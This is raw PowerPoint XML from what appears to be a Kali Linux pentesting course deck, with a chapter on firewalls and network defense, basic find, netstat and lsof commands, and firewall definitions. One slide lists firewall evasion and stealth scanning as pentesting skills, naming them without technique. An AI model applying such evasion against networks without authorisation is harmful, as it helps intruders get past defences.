                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-3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52525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-3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ourier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-2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52525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>udp</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-4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together</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="537845" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2280"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>lsof</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-35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52525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>–n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-3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52525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>–i4TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-3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52525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>–i4UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525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0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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>MacOS</a:t>
            </a:r>
            <a:endParaRPr sz="20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2000">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="9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these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commands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show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information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about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the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processes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listening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machine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processes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connecting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remote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servers.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001075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B7BDF30-362B-C5CE-75DA-6E0F3AC2B29F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6983476" y="185828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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:endParaRPr sz="3600" dirty="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D04E3B7-5C63-95DA-60E1-409679F7109F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3769361" y="4766051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529F9D6-255E-CBDD-3A01-2E5C18B7D27A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3769361" y="4776697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89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3C383D1-939D-18E1-803C-7908E79AE3EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1477900" y="1597356"/>
            <a:ext cx="53314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 marR="5080" indent="1224915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Firewalls</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" spc="-25" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" dirty="0"/>
              <a:t>Network</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" spc="-45" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5400" spc="-10" dirty="0"/>
              <a:t>Defense</a:t>
            </a:r>
            <a:endParaRPr sz="5400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="402886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F3AD3-D349-40D3-AFD6-4B8E24FA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D4C2D-A484-BB31-B32A-840650A09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5AF179F-4D88-B095-D899-F8807E5851DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8324468" y="255854"/>
            <a:ext cx="682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C00000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>2.1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A217DD0-617C-0051-EB70-D2150E0232E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10353" y="4836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5C8A908-BB52-BC61-1C84-41101916508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110353" y="4846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9</a:t>
            </a:fld>
            <a:endParaRPr spc="-2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3F94AD0-ADE4-E99D-53A5-06CF070938C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5147817" y="2078558"/>
            <a:ext cx="3002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Protocols</a:t>
            </a:r>
            <a:endParaRPr sz="5400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CB79A5E5-3E0E-4E43-BA1E-342CCFD6196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DA2349F2-AE60-FD39-5BAD-0C7E8476B29D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-13716" y="1034796"/>
            <a:ext cx="9173210" cy="3347085"/>
            <a:chOff x="-13716" y="1034796"/>
            <a:chExt cx="9173210" cy="334708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BB1E829D-5CC3-E7A0-8945-E5B15CEE88E5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5B1BEB5B-3FCC-9410-176A-87A29E578247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326B782F-64B1-E97C-25EA-A3B2975D264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1868424"/>
              <a:ext cx="457200" cy="1676400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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90C651BB-D489-998E-466B-ED61E8035661}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411276" y="114045"/>
            <a:ext cx="7936052" cy="682625"/>
          </a:xfrm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Kali Linux Basics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1E713A6D-5504-B393-3048-F6F73174E97F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5237353" y="4963077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6000" dirty="0"/>
              <a:t>|</a:t>
            </a:r>
            <a:endParaRPr sz="1500" baseline="600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A843C276-5972-BD43-353F-4E6A497996B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5237353" y="4973723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marL="0">
              <a:defRPr sz="1000" b="1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t>9</a:t>
            </a:fld>
            <a:endParaRPr spc="-20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DE5C04E8-2E41-5202-738A-23376C438DAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="742950"/>
            <a:ext cx="5433695" cy="729615"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="237363" rIns="0" bIns="0" rtlCol="0">
            <a:no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1.2 All Kali Linux commands :</a:t>
            </a:r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endParaRPr lang="en-US" altLang="en-US" spc="-10" dirty="0"/>
          </a:p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lang="en-US" altLang="en-US" spc="-10" dirty="0"/>
              <a:t>      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D535AD00-CB57-4206-ECD0-FD5107663564}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467583" y="1915698"/>
            <a:ext cx="29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-find / -name "file.txt"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D97AF3-E5F3-332C-1226-7D2D88C28CF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2929692" y="2145856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49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0997DB17-27DE-8238-6AA2-7AE8AB8305DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4303218" y="1936296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file in system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95F778CE-5EAC-696D-CAA9-C93DB792B739}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599" y="2330450"/>
            <a:ext cx="30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-find /home -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> "file.txt"     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B6614A-E102-CB0C-C3EE-E3A815A3CB67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3745736" y="2608915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52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FE6DE42-FB8A-692E-404A-731EA9ADCA58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5052249" y="2387599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search file upper and lower letters  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A252B648-0444-37ED-9E03-E03E98223652}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599" y="2724150"/>
            <a:ext cx="38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find / -type d -name "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>foldername</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>"   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   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8D30D1-D05C-A57E-F608-241ECAD1B2DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4509299" y="2991907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 Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3728F673-FCD1-BD3B-0DCE-223FA4324C1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5893688" y="2809771"/>
            <a:ext cx="3113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folder in system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13850BA5-E002-570A-B315-AC54FF5A897C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599" y="3184323"/>
            <a:ext cx="331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altLang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>find / -type f -name "*.txt"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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D9B9B002-3A5D-FA9B-0D3D-E49E36EBE7CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5425771" y="3207183"/>
            <a:ext cx="300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file end .txt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BF87D3A-33D3-0B07-0982-75AB7D032F91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3901748" y="3388533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085F24B-2C2F-459A-24AF-788ABBA9E1A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3775899" y="3737457"/>
            <a:ext cx="1276350" cy="2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53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19354786-DE83-EF99-F239-7BA03A71D3EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3603453"/>
            <a:ext cx="30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-find /home  -size +100M  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5D4F183-B7CF-C591-C43C-F4AB88B2FFB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5455157" y="3528853"/>
            <a:ext cx="25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Search file size +100M     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573471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FA74FD6-F88A-D8EF-15EE-06126D91E31E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="439916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9F68E44-0EFB-2D68-126E-5286EE1CDDA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="527342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 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Firewalls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Network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Defense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A75ECAB-7A3B-0331-56EC-BE57C7B45377}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5226419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BC3AF97-8CBF-FA77-5F75-4DA85765765F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5226419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90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9F9677A-F616-1EDB-0F36-19D1DCF66E16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="526733" y="1629475"/>
            <a:ext cx="8090534" cy="236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There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many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different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appliances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market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endParaRPr sz="2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system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administrator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protect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network.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These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devices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different</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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techniques</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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work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on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different</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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layers</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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perform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access</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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control,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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detection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b="1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prevention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062228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4E19C2E1-2396-1FC2-AE31-34B3D7473DA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89" y="1"/>
            <a:ext cx="9144000" cy="5143498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A9CCC96-89B5-FE7E-87E2-3830E3E1E3E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-128" y="1049275"/>
            <a:ext cx="9144000" cy="3317875"/>
            <a:chOff x="761" y="1049274"/>
            <a:chExt cx="9144000" cy="331787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B07E5D8F-2FF8-8CE0-E0E2-2D0905017BBB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9144000" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3317748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9144000" y="33177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>
                <a:alpha val="76861"/>
              </a:srgb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B02CB34-8345-0453-BAEF-686D7892BBCD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="761" y="1049274"/>
              <a:ext cx="9144000" cy="3317875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9144000" h="3317875">
                  <a:moveTo>
                    <a:pt x="0" y="3317748"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9144000" y="3317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177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9220C88-5E53-D3D4-B152-8450DF071BA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410387" y="114046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lang="en-US" dirty="0"/>
              <a:t>9 </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Firewalls</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-2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Network</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-55" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>Defense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7BAE4293-95F7-7331-E671-7A045B5AF7E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5109464" y="4836078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AD52C7FD-AD37-65B2-C625-B55476A76B21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5109464" y="4846724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91</a:t>
            </a:fld>
            <a:endParaRPr spc="-20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10F48CC-B4ED-B792-A91C-92E50B4424D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="687451" y="1635710"/>
            <a:ext cx="6236335" cy="214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How</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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does this</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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support</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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my</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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pentesting </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>career?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>
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="721360" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="721360" algn="l"/>
              </a:tabLst>
            </a:pP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Evading</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-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firewalls</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="72136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721360" algn="l"/>
              </a:tabLst>
            </a:pP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Advanced</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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stealth</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-9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scanning</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="72136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721360" algn="l"/>
              </a:tabLst>
            </a:pP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Filtering</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1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evasion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890893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B840FEF-F679-F948-BE63-4114EEE39589}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520052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Firewalls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D9130CF-BFE1-062A-CBE9-F38C1674DC17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="519443" y="1154292"/>
            <a:ext cx="7622540" cy="200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Firewalls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specialized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software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modules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running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a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computer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dedicated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device.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>
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="33223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They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serve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filter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packets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coming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out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network.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292ED869-7B97-E571-775F-CD3A6B960FCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2814941" y="2190592"/>
            <a:ext cx="5809052" cy="2616199"/>
            <a:chOff x="2706165" y="2189714"/>
            <a:chExt cx="5809052" cy="2616199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A3F4EF1D-B8C3-1A18-BA37-C7276C14D22F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4493143" y="2210300"/>
              <a:ext cx="3993515" cy="2567305"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3993515" h="2567304">
                  <a:moveTo>
                    <a:pt x="1674230" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1550916" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1484516" y="9489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1418115" y="28469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1389658" y="37959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1356458" y="47449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1266344" y="90154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209429" y="128114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138287" y="185054"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1090858" y="232504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071886" y="260974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1052915" y="284698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033944" y="313168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1019715" y="336893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1005486" y="365363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="986515" y="393833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977029" y="427048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="958058" y="483988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="948572" y="517203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="943829" y="545672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934343" y="612102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934343" y="697512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905886" y="702257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="872686" y="707002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="844229" y="716492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="811029" y="725982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="787315" y="740217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="758858" y="759197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735143" y="773432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673486" y="844606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="630800" y="925271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="621315" y="982211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616572" y="1020171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="621315" y="1039151"/>
                  </a:lnTo>
                  <a:lnTo>
